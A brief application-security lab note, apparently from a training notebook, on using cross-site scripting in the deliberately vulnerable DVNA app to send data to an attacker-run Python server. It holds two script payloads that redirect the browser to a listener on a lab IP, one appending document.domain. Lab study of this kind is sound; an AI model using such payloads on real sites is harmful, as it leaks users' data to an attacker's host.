Appsec

XSS - Sending data to remote server

Application Used - DVNA

Run the python server on the kali box (attacker's machine)

python -m SimpleHTTPServer 8089
<script>document.location="http://10.0.2.12:8089/?"</script>
<script>document.location="http://10.0.2.12:8089/?"+document.domain</script>

PreviousStored XSS - MutillidaeNextA8 - Insecure Deserialization

Last updated